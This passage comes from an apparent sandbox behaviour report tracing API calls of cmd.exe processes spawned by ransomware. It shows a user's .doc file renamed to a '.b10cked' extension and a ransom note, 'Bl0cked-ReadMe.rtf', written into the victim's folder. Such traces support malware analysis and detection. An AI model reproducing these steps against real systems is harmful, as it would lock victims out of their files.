lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0139.519] _wcsnicmp (_String1="COPYCMD", 
_String2="ALLUSER", _MaxCount=0x7) returned 2 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0139.519] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) 
returned -13 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0139.520] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0139.520] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0139.520] _wcsicmp (_String1="UZYEGR~1.DOC", _String2=".") returned 71 [0139.520] _wcsicmp (_String1="UZYEGR~1.DOC", _String2="..") returned 71 [0139.520] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr~1.doc")) returned 0x20 [0139.520] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3020f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.520] SetErrorMode (uMode=0x0) returned 0x0 [0139.520] SetErrorMode (uMode=0x1) returned 0x0 [0139.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", nBufferLength=0x104, lpBuffer=0x26eca4, lpFilePart=0x26ec8c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", lpFilePart=0x26ec8c*="UZYEGR~1.DOC") returned 0x48 [0139.520] SetErrorMode (uMode=0x0) returned 0x1 [0139.595] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1")) returned 0x12 [0139.595] _wcsicmp (_String1="UZYEGR~1.DOC", _String2=".") returned 71 [0139.596] _wcsicmp (_String1="UZYEGR~1.DOC", _String2="..") returned 71 [0139.596] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr~1.doc")) returned 0x20 [0139.596] SetErrorMode (uMode=0x0) returned 0x0 [0139.596] SetErrorMode (uMode=0x1) returned 0x0 [0139.596] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", nBufferLength=0x104, lpBuffer=0x26f120, lpFilePart=0x26eeb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", lpFilePart=0x26eeb8*="UZYEGR~1.DOC") returned 0x48 [0139.596] SetErrorMode (uMode=0x0) returned 0x1 [0139.596] SetErrorMode (uMode=0x0) returned 0x0 [0139.596] SetErrorMode (uMode=0x1) returned 0x0 [0139.596] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked", nBufferLength=0x104, lpBuffer=0x26f328, lpFilePart=0x26eeb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked", lpFilePart=0x26eeb8*="UzyEGr8akjufgS.doc.b10cked") returned 0x56 [0139.596] SetErrorMode (uMode=0x0) returned 0x1 [0139.596] SetLastError (dwErrCode=0x0) [0139.596] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr8akjufgs.doc.b10cked")) returned 0xffffffff [0139.596] GetLastError () returned 0x2 [0139.596] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", fInfoLevelId=0x1, 
lpFindFileData=0x26e834, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e834) returned 0x302300 [0139.597] FindNextFileW (in: hFindFile=0x302300, lpFindFileData=0x26e834 | out: lpFindFileData=0x26e834) returned 0 [0139.597] GetLastError () returned 0x12 [0139.597] FindClose (in: hFindFile=0x302300 | out: hFindFile=0x302300) returned 1 [0139.599] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x301e90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301e90) returned 0x302300 [0139.600] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked", nBufferLength=0x104, lpBuffer=0x26eacc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked", lpFilePart=0x0) returned 0x56 [0139.600] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc", nBufferLength=0x104, lpBuffer=0x26eacc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc", lpFilePart=0x0) returned 0x4e [0139.600] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr8akjufgs.doc")) returned 0x20 [0139.600] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr8akjufgs.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked" (normalized: 
"c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\uzyegr8akjufgs.doc.b10cked"), dwFlags=0x3) returned 1 [0139.600] FindClose (in: hFindFile=0x302300 | out: hFindFile=0x302300) returned 1 [0139.601] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea80 | out: _Buffer=" 1") returned 9 [0139.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.601] GetFileType (hFile=0x7) returned 0x2 [0139.601] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0139.601] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea0c | out: lpMode=0x26ea0c) returned 1 [0139.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.601] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ea40 | out: lpConsoleScreenBufferInfo=0x26ea40) returned 1 [0139.602] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0139.602] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ea80 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0139.602] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ea64, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ea64*=0x1a) returned 1 [0139.602] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.602] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.603] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.603] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.603] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.603] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.603] SetConsoleInputExeNameW () returned 0x1 [0139.603] GetConsoleOutputCP () returned 0x1b5 
[0139.603] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.608] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.609] exit (_Code=0) Process: id = "148" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xd0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14516 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14517 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14518 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14519 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 14520 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14521 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 
0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14522 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14523 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14524 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14525 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15252 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15253 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15254 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15255 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15256 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 15257 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15258 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 
region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15259 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15260 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15261 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15262 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15263 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15264 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15265 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15290 start_va = 0x390000 end_va = 0x457fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 15291 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" 
(normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15292 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15293 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15294 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15295 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15296 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 15297 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 15298 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 15299 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 205 os_tid = 0xcf4 [0139.450] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fd7c | out: lpSystemTimeAsFileTime=0x22fd7c*(dwLowDateTime=0x8d0d5960, dwHighDateTime=0x1d440a9)) [0139.450] GetCurrentProcessId () returned 0xd0c [0139.450] GetCurrentThreadId () returned 0xcf4 [0139.450] GetTickCount () returned 0x2bda3 [0139.450] QueryPerformanceCounter (in: lpPerformanceCount=0x22fd74 | out: lpPerformanceCount=0x22fd74*=19623965154) returned 1 [0139.451] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.451] __set_app_type (_Type=0x1) [0139.451] __p__fmode () returned 0x76b331f4 [0139.451] __p__commode () returned 
0x76b331fc [0139.451] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.451] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.451] GetCurrentThreadId () returned 0xcf4 [0139.451] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcf4) returned 0x38 [0139.451] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.451] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.451] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fd0c | out: phkResult=0x22fd0c*=0x0) returned 0x2 [0139.462] VirtualQuery (in: lpAddress=0x22fd43, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, 
Protect=0x4, Type=0x20000)) returned 0x1c [0139.462] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fcdc, dwLength=0x1c | out: lpBuffer=0x22fcdc*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0139.462] GetConsoleOutputCP () returned 0x1b5 [0139.463] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.463] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0139.463] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.463] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.465] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.466] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.466] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.474] GetEnvironmentStringsW () returned 0x2a01d8* [0139.475] FreeEnvironmentStringsW (penv=0x2a01d8) returned 1 [0139.475] GetEnvironmentStringsW () returned 0x2a01d8* [0139.475] FreeEnvironmentStringsW (penv=0x2a01d8) returned 1 [0139.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec7c | out: phkResult=0x22ec7c*=0x40) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x0, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, 
lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x1, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x1, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x0, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x40, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x40, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x40, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegCloseKey (hKey=0x40) returned 0x0 [0139.475] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec7c | out: phkResult=0x22ec7c*=0x40) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x40, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: 
lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x1, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x1, lpcbData=0x22ec80*=0x1000) returned 0x2 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x0, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x9, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x4, lpData=0x22ec88*=0x9, lpcbData=0x22ec80*=0x4) returned 0x0 [0139.475] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec84, lpData=0x22ec88, lpcbData=0x22ec80*=0x1000 | out: lpType=0x22ec84*=0x0, lpData=0x22ec88*=0x9, 